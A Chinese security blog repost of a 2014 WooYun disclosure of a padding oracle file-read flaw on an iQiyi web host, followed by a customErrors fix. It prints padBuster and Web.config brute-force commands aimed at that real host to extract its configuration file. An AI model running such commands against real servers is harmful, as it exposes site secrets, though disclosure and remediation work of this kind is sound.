记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

奇艺padding oracle文件读取漏洞

2014-07-24 19:30

padding oracle文件读取漏洞



./padBuster.pl http://tide.iqiyi.com/WebResource.axd?d=XMQ9NVUp8W3Nas4YbO6SLg2 XMQ9NVUp8W3Nas4YbO6SLg2 16 -encoding 3 -plaintext "|||~/Web.config" -prefix XMQ9NVUp8W3Nas4YbO6SLg2



./Web.config_bruter.pl http://tide.iqiyi.com/ScriptResource.axd gb25MYvKoLBUr6zadAbxtAAAAAAAAAAAAAAAAAAAAAA1 16

漏洞证明:

2014-06-09 15:57:20的屏幕截图.png





2014-06-09 16:10:22的屏幕截图.png

修复方案:

<configuration>



<system.web>



<customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.aspx" />



</system.web>



</configuration>


知识来源: www.wooyun.org/bugs/wooyun-2014-064193

阅读:160392 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“奇艺padding oracle文件读取漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云